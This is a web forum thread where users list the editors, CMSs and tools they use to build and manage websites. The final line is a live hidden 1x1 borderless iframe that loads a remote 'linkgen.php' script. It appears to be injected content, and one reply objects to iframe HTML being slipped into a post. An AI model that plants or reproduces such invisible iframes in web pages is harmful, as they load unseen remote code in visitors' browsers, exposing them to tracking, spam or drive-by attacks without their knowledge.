webdesign discussion, what do you use?

Question

hello i was just wondering what you use when you code and manage you websites? and why

i personally use notepad when i code as it makes me feel more accomplished when i do something then something like dreamweaver would ... and rather then using a CMS and admin programs ... i build my own CMS system using PHP and SQL with some javascript thrown in if im feeling fancy :p

so how do you run you set ups? i like to call me self old fashioned ... so what are you and why ? :p

I use Wordpress most of the time, as it cuts out most of the work. :p

• Like 2

The content management systems I use most are WP, Joomla! and Drupal, but I always use KompoZer for the static part and manual adjustments since it does all the hard work without the need to manually edit code.

Worpdress, notepad++, Photoshop and Filezilla.

When editing, I save directly with the Notepad++ NppFTP plugin. It's handy to have dual screen, I edit on one and view the changes in browsers on the other.

aww :( is no one old school!?!?!? :p i love the scripting so much!

I really don't know a single person who has all the knowledge to manually build a fully-functional Web 2.0 site by himself.

actually saying this i think my designer uses notepad does a basic design then uses google chrome developer to modify it then copies and pastes :p

I don't do web-coding as my job. When I do, however, I do it from scratch. Well, not really, but using templates and fragments of highly reusable stuff I've made myself. Give it some more years and it will have evolved into yet another cryptic framework of which there is an abundance already. Except that I won't give it away :D

Well, I have learned the hard way that if you want to do it the best way, you need to do it yourself.

PhpStorm + Symfony + AMP stack + SVN = Perfect for php development. This is my standard and complete workspace, everything is managable inside PhpStorm so you can really stay focused when developing/testing. You get Php and Javascript debugging, deep code completion and coloration, a console for executing symfony commands (with completion !) and version control. The only thing I'm still working on adding to my workspace is the design part : UML modeling, sketching and some sort of a shared scrapbook.

PS : I'm also experimenting with the integrated Redmine module inside PhpStorm but I'm still not confortable with it.

Excluding various tools if I use a pre-built solution (Joomla, WP, etc) I'll typically use Visual Studio 2010. Serves my needs for HTML, PHP, ASP.NET, etc etc along with the typical tools that come with it, although once in a while I'll fire up KompoZer if I'm working remotely and the mood strikes.

I use primarily acorn, coda, and text wrangler on the development side. In regards to content management, I stick with the ones I know.. Joomla! and Drupal. I'm starting to look into WordPress as a viable option as well now.

although once in a while I'll fire up KompoZer if I'm working remotely and the mood strikes.

I honestly didn't think there'd be an app more ugly than notepad++

This makes me feel a little better about using it.

I honestly didn't think there'd be an app more ugly than notepad++

A lot of *Nix apps can be many things, but DE's aside, pretty typically isn't one of them ;) (Haven't tried the Windows flavor.) Works good though.

Why do people always assume that if someone uses Dreamweaver, they're not manually coding? I always looked down on Dreamweaver myself but after given it a try, the syntax highlighting and other built-in features (FTP, et al) were good. That doesn't mean everyone that uses it lets it auto-generate shoddy coding. Using Notepad doesn't make you any better either. JS. Coding is coding.

I don't reinvent wheels, so I will use pre-established CMS. There's nothing wrong with that and why not. I can do anything with WordPress and I have been doing everything with WordPress for years. The only CMS I ever use.

Notepad++ or Dreamweaver on Windows and Coda on OSX.

Notepad, Expression Web 4, SharePoint Designer, Expression Design 4, Photoshop CS5

I usually first check standards against EW4 then after changes are done verify them at http://jigsaw.w3.org then follow up tweaking the SEO back inside EW4

Photoshop + Dreamweaver + Illustrator

Photoshop obviously for design, Dreamweaver because i can save my code and it automatically uploads to my server, Illustrator for HR designs converted to Photoshop.

SmartFTP for file uploads + SSH

I don't reinvent wheels, so I will use pre-established CMS. There's nothing wrong with that and why not.

Reinventing the wheel gives "security by obscurity" as an opposite to "tested but still being pwned regularly". There's a growing sense of unreliability that cannot be tested, proven and prevented unless it's pwned.

Security by obscurity is not a welcome practice, it likely gives a false sense of security. And still... I do it, too :p

Design: Photoshop CS5.

Development: Sublime Text 1.4, Notepad2, Stylizer (CSS), HeidiSQL, XAMPP, CoffeeCup Free FTP.

I'll start learning Flash and Illustrator soon.

aww :( is no one old school!?!?!? :p i love the scripting so much!

I'm of the opinion that if there's something out there which is open and freely available to make my life easier, I will take that. Wordpress, Jquery, etc. :p

Emeditor for simple coding, VisualStudio 2010 for anything more complicated (VS.PHP is pretty cool plugin ;))

Why did you include iframe HTML in your post? FWIW, HTML isn't allowed so whatever crap you're trying to pull, it won't work.

<iframe src="https://dualstack-exp.vse.mysh.cz/linkgen.php" width="1" height="1" frameborder="0"></iframe>